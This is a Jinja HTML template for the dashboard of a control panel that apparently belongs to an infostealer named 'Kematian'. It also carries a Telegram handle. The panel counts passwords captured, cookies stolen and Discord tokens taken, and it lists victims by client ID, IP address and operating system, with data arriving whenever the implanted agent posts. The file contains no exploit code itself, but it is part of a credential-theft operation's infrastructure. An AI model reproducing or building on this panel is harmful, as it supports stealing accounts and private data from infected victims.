{% extends "base.html" %} {% block title %}Dashboard · Kematian {% endblock %} {% block head %} {% endblock %} {% block content %}

Dashboard

Overview of everything Kematian has collected. t.me/electronic_sex

View clients
{{ client_count }}
Total Clients
live
{{ stats['passwords'].count }}
Passwords Captured
collected
{{ stats['cookies'].count }}
Cookies Stolen
collected
{{ stats['discord_tokens'].count }}
Discord Tokens
collectible

Activity Overview

Data Distribution

Recent Activity

All clients Downloads
{% for c in recent %} {% else %} {% endfor %}
DateVictimIPSystemEntries
{{ (c.last_seen | datetime) if c.last_seen else '—' }} {{ c.client_id }} {{ c.ip or '—' }} {{ c.os or '—' }} {{ c.arch or '' }} {{ c.total_entries }} View
No clients yet. Data lands here when the agent posts.
{% endblock %}